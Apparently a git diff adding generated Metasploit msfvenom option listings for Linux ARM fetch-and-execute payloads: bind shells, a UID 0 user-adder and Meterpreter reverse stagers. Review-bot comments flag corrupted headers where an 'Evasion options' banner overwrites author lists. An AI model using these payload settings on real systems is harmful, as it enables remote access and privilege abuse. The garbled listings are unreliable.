script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + 
MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armbe-shell_bind_tcp.txt new file mode 100644 index 0000000..2c921fc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armbe-shell_bind_tcp.txt 
@@ -0,0 +1,77 @@ + + Name: HTTPS Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/armbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command to execute. +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PtSVRKKzekZw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-https-armle-adduser.txt b/msfvenom/payload_options/cmd-linux-https-armle-adduser.txt new file mode 100644 index 0000000..e1d1f05 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-adduser.txt 
@@ -0,0 +1,75 @@ + + Name: HTTPS Fetch, Linux Add User + Module: payload/cmd/linux/https/armle/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dCOOzZrXb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. 
+ Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
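Review bot: the `FETCH_FILELESS` description in this hunk has an unclosed parenthesis, `(for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)`, which reads as a typo in the rendered docs. It is copied from the module's own option text rather than introduced by the generator, so the fix belongs in the upstream module description; it may be worth an upstream PR so the next regeneration picks it up, since the same text recurs in every file in this change.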
diff --git a/msfvenom/payload_options/cmd-linux-https-armle-exec.txt b/msfvenom/payload_options/cmd-linux-https-armle-exec.txt new file mode 100644 index 0000000..69ec3fd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-exec.txt 
@@ -0,0 +1,73 @@ + + Name: HTTPS Fetch, Linux Execute Command + Module: payload/cmd/linux/https/armle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME eldHnRtCl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. 
+ Execute an arbitrary command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..7bfa765 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-bind_tcp.txt 
@@ -0,0 +1,101 @@ + + Name: HTTPS Fetch, Bind TCP Stager + Module: payload/cmd/linux/https/armle/meterpreter/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uXzvchTCBO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi 
template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..0cb3a4a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/armle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Nor +Evasion options for payload/cmd/linux/https/armle/meterpreter/reverse_tcp: +========================= + + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uOeaiAXBWBy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + 
MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..40abca9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_http.txt 
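Review bot: the header block of this file is corrupted: `Rank: Nor` is cut off and immediately followed by an `Evasion options for payload/cmd/linux/https/armle/meterpreter/reverse_tcp:` banner with its `=====` underline, and the `Provided by:` list has lost its first entries (only `nemo` and `tkmru` survive). That pattern looks like two msfvenom outputs (the standard options listing and the evasion options listing) being captured into the same file without being serialised, so one overwrote the other mid-line; regenerate this file with a single ordered write and check the `Provided by:` list against the module's author list.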
@@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armle/meterpreter_reverse_http: +========================= + +ook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XDlRDyozw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..6978b83 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armle-meterpreter_reverse_https.txt 
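Review bot: same corruption as the reverse_tcp file: `Provided by:` is empty, an `Evasion options for payload/cmd/linux/https/armle/meterpreter_reverse_http:` banner follows it, and the author list survives only as the fragment `ook@rapid7.com>` and `timwr`, so this file needs regenerating too. As in the other files, `FETCH_FILENAME XDlRDyozw` is a per-run random value that will churn on every regeneration.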
